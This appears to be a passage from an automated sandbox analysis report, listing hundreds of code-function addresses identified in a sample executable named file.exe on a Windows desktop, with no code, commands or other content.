      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC64300_2_00FC6430
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010045CE0_2_010045CE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010445D50_2_010445D5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF642B0_2_00FF642B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010165DB0_2_010165DB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100A5DB0_2_0100A5DB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010805D70_2_010805D7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AA5ED0_2_010AA5ED
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF84080_2_00FF8408
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E40F0_2_0100E40F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C40E0_2_0101C40E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010984180_2_01098418
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011024070_2_01102407
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104041C0_2_0104041C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011444350_2_01144435
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010264360_2_01026436
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105645E0_2_0105645E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010904560_2_01090456
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109E4560_2_0109E456
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107A4600_2_0107A460
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E48F0_2_0106E48F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA65710_2_00FA6571
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102A4A00_2_0102A4A0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103E4B90_2_0103E4B9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010704BA0_2_010704BA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010624C70_2_010624C7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AE4CC0_2_010AE4CC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B44C30_2_010B44C3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010924C40_2_010924C4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BE4C60_2_010BE4C6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108A4D50_2_0108A4D5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D24EB0_2_010D24EB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB66E70_2_00FB66E7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C7320_2_0111C732
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBC6D70_2_00FBC6D7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011587540_2_01158754
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010867410_2_01086741
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109075F0_2_0109075F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108E76A0_2_0108E76A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F966900_2_00F96690
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103076A0_2_0103076A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105E76E0_2_0105E76E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC66900_2_00FC6690
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE6900_2_00FCE690
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104A7700_2_0104A770
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D07740_2_010D0774
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E47700_2_010E4770
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104678D0_2_0104678D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA26700_2_00FA2670
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102C78F0_2_0102C78F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010847960_2_01084796
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A27B80_2_010A27B8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C7B00_2_0106C7B0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107A7DB0_2_0107A7DB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010387FF0_2_010387FF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF07F70_2_00FF07F7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010546110_2_01054611
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF47D70_2_00FF47D7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104262C0_2_0104262C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C86230_2_010C8623
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A863C0_2_010A863C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CC6350_2_010CC635
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E66310_2_010E6631
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108C65B0_2_0108C65B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA67A50_2_00FA67A5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101066C0_2_0101066C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E068A0_2_010E068A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EC68A0_2_010EC68A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E68B0_2_0100E68B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E26810_2_010E2681
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA75B0_2_00FFA75B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105A6AC0_2_0105A6AC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF874C0_2_00FF874C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010746BF0_2_010746BF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010566BF0_2_010566BF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA87310_2_00FA8731
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010186CF0_2_010186CF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C26EF0_2_010C26EF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010646E00_2_010646E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010946E10_2_010946E1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB07170_2_00FB0717
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010446F40_2_010446F4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107C9020_2_0107C902
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010569240_2_01056924
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D89250_2_010D8925
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AE9230_2_010AE923
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103E92F0_2_0103E92F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B89340_2_010B8934
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EA9590_2_010EA959
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010169620_2_01016962
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109296D0_2_0109296D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010109700_2_01010970
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010029840_2_01002984
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103A9840_2_0103A984
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF68570_2_00FF6857
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C49BF0_2_010C49BF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104E9D40_2_0104E9D4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102A9D80_2_0102A9D8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DC9D10_2_010DC9D1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010769E20_2_010769E2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC9E00_2_010AC9E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CE81A0_2_010CE81A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101281A0_2_0101281A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EE8440_2_010EE844
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010828430_2_01082843
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114C8460_2_0114C846
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BC85F0_2_010BC85F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107885A0_2_0107885A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102885C0_2_0102885C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010368630_2_01036863
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104A8600_2_0104A860
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DA86A0_2_010DA86A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F989900_2_00F98990
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DE8610_2_010DE861
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010068810_2_01006881
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB297F0_2_00FB297F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B48810_2_010B4881
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E8AB0_2_0100E8AB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D28A10_2_010D28A1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010488B70_2_010488B7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010688CF0_2_010688CF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010948E00_2_010948E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010088EE0_2_010088EE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108A8E70_2_0108A8E7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AA8F80_2_010AA8F8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109A8FC0_2_0109A8FC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010208F40_2_010208F4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BAB0B0_2_010BAB0B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01052B020_2_01052B02
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2B1E0_2_010C2B1E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A4B2A0_2_010A4B2A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01012B200_2_01012B20
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01074B210_2_01074B21
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106EB2C0_2_0106EB2C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2B200_2_010E2B20
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E4B3D0_2_010E4B3D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCAC00_2_00FCCAC0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102EB3D0_2_0102EB3D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D4B4E0_2_010D4B4E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BEB420_2_010BEB42
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF2AA10_2_00FF2AA1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01048B780_2_01048B78
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01090B770_2_01090B77
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D6B8F0_2_010D6B8F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103EB900_2_0103EB90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFCA5A0_2_00FFCA5A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9CA540_2_00F9CA54
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CABBF0_2_010CABBF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109CBBC0_2_0109CBBC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA4A400_2_00FA4A40
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01026BD50_2_01026BD5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108ABF90_2_0108ABF9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01096BF80_2_01096BF8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01036BF10_2_01036BF1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034BF00_2_01034BF0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01074A070_2_01074A07
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B2A1D0_2_010B2A1D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF0BE50_2_00FF0BE5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103CA280_2_0103CA28
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF6BCC0_2_00FF6BCC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F94BA00_2_00F94BA0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6A770_2_010E6A77
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A8A740_2_010A8A74
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01034A800_2_01034A80
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DAA8E0_2_010DAA8E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA6B7E0_2_00FA6B7E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054A9B0_2_01054A9B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FACB5A0_2_00FACB5A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E0ABE0_2_010E0ABE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100AAB80_2_0100AAB8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004AC80_2_01004AC8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105CAEE0_2_0105CAEE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105EAF20_2_0105EAF2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB2CF80_2_00FB2CF8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01074D0D0_2_01074D0D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01056D0E0_2_01056D0E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109CD1C0_2_0109CD1C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCCE00_2_00FCCCE0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106CD250_2_0106CD25
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101AD2A0_2_0101AD2A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01060D350_2_01060D35
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01098D450_2_01098D45
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D0D550_2_010D0D55
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE8C9B0_2_00FE8C9B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01076D620_2_01076D62
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101ED940_2_0101ED94
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01080D950_2_01080D95
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DCDAC0_2_010DCDAC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DADBD0_2_010DADBD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4C4D0_2_00FC4C4D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01092DBB0_2_01092DBB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CCDBB0_2_010CCDBB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01024DB90_2_01024DB9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC6C400_2_00FC6C40
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100EDBC0_2_0100EDBC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFAC240_2_00FFAC24
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107EDD80_2_0107EDD8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA8C1E0_2_00FA8C1E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106EDE90_2_0106EDE9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054DFE0_2_01054DFE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01044C0F0_2_01044C0F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D2C1A0_2_010D2C1A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01072C2A0_2_01072C2A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C6C350_2_010C6C35
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01006C440_2_01006C44
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102CC500_2_0102CC50
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114EC490_2_0114EC49
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AEC6A0_2_010AEC6A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107AC6F0_2_0107AC6F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107EC680_2_0107EC68
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102AC8B0_2_0102AC8B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4D700_2_00FB4D70
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01000C8F0_2_01000C8F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2C990_2_010C2C99
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCD600_2_00FCCD60
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A2C950_2_010A2C95
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01066CA40_2_01066CA4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109ECAD0_2_0109ECAD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01040CAB0_2_01040CAB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01008CB60_2_01008CB6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011C4CA50_2_011C4CA5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01150CDE0_2_01150CDE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102ECDF0_2_0102ECDF
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01030CDE0_2_01030CDE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A8CE20_2_010A8CE2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D4CF50_2_010D4CF5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01070F070_2_01070F07
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D8F000_2_010D8F00
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6F030_2_010E6F03
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01064F2E0_2_01064F2E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01050F2E0_2_01050F2E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01038F330_2_01038F33
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106AF330_2_0106AF33
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB6EBE0_2_00FB6EBE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01062F510_2_01062F51
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F92EA00_2_00F92EA0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01036F5D0_2_01036F5D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101EF6D0_2_0101EF6D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA6E970_2_00FA6E97
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100AF8C0_2_0100AF8C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A8FB20_2_010A8FB2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102AFC20_2_0102AFC2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CAFCD0_2_010CAFCD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A2FD10_2_010A2FD1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01006FEC0_2_01006FEC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01028FEE0_2_01028FEE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAAE000_2_00FAAE00
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCE000_2_00FCCE00
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01016E1B0_2_01016E1B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01046E250_2_01046E25
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105EE260_2_0105EE26
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA0FD60_2_00FA0FD6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C0E3E0_2_010C0E3E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104EE3F0_2_0104EE3F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01012E3E0_2_01012E3E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFAFBB0_2_00FFAFBB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01086E4E0_2_01086E4E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA8FAD0_2_00FA8FAD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D6E6D0_2_010D6E6D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B8E6C0_2_010B8E6C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01022E730_2_01022E73
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01090E7A0_2_01090E7A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01004E860_2_01004E86
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01042E960_2_01042E96
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105CE960_2_0105CE96
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB8F5D0_2_00FB8F5D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAEF300_2_00FAEF30
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B0EDD0_2_010B0EDD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01048ED30_2_01048ED3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA4F080_2_00FA4F08
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01154EEC0_2_01154EEC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011371180_2_01137118
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106310D0_2_0106310D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF90E30_2_00FF90E3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DF1130_2_010DF113
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010071390_2_01007139
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010231450_2_01023145
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101514A0_2_0101514A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D1670_2_0100D167
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108F1670_2_0108F167
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C91780_2_010C9178
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBD0850_2_00FBD085
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010831880_2_01083188
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010311860_2_01031186
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F990700_2_00F99070
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D11830_2_010D1183
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AD1960_2_010AD196
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C11AA0_2_010C11AA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010771AC0_2_010771AC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109F1D10_2_0109F1D1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010471D80_2_010471D8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010431E00_2_010431E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109D1EC0_2_0109D1EC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010171E80_2_010171E8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105D1EC0_2_0105D1EC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFF00F0_2_00FFF00F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AF1F90_2_010AF1F9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107F1F10_2_0107F1F1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010671FC0_2_010671FC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BF0020_2_010BF002
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D0270_2_0100D027
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103F0350_2_0103F035
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109B03E0_2_0109B03E
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010210560_2_01021056
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFD1A70_2_00FFD1A7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA71900_2_00FA7190
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010930730_2_01093073
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010950730_2_01095073
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104507F0_2_0104507F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF317A0_2_00FF317A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010850810_2_01085081
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108B09F0_2_0108B09F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF71670_2_00FF7167
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010ED0950_2_010ED095
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E30AD0_2_010E30AD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010350AD0_2_010350AD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101B0B80_2_0101B0B8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D30C80_2_010D30C8
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010590CD0_2_010590CD
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107B0CC0_2_0107B0CC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010750CB0_2_010750CB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BD0D60_2_010BD0D6
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BB0EA0_2_010BB0EA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010690E50_2_010690E5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010730ED0_2_010730ED
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D50E30_2_010D50E3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104D0F10_2_0104D0F1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DB31B0_2_010DB31B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103D3220_2_0103D322
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB92D00_2_00FB92D0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010993390_2_01099339
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA92BA0_2_00FA92BA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010433530_2_01043353
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100B35B0_2_0100B35B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF129F0_2_00FF129F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107937C0_2_0107937C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D3870_2_0100D387
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010813960_2_01081396
